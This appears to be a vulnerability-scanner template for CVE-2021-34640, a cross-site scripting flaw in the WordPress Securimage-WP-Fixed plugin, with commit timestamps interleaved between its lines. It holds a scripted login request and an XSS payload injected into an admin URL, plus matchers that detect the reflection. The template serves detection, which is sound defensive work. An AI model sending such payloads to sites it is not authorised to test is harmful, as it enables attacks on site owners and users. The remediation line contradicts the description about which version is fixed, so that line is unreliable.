2022-02-04 19:19:25 +00:00
id : CVE-2021-34640
info :
2022-08-29 13:55:23 +00:00
name : WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting
2022-02-04 19:19:25 +00:00
author : dhiyaneshDK
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.
2023-09-06 12:09:01 +00:00
remediation : |
Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability.
2022-02-04 19:19:25 +00:00
reference :
- https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640
- https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-34640
2022-02-04 19:19:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-04 19:19:25 +00:00
cve-id : CVE-2021-34640
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00116
2023-10-14 11:27:55 +00:00
epss-percentile : 0.44995
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : securimage-wp-fixed_project
product : securimage-wp-fixed
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : wpscan,wordpress,cve,cve2021,wp-plugin,authenticated
2022-02-04 19:19:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-04 19:19:25 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 18:29:30 +00:00
GET //wp-admin/options-general.php/"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1
2022-02-04 19:19:25 +00:00
Host : {{Hostname}}
2022-02-08 18:29:30 +00:00
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-02-04 19:19:25 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-02-08 18:29:30 +00:00
words :
- '</script><script>alert(document.domain)</script>'
2022-02-04 19:19:25 +00:00
- type : word
2022-02-08 18:29:30 +00:00
part : header
2022-02-04 19:19:25 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200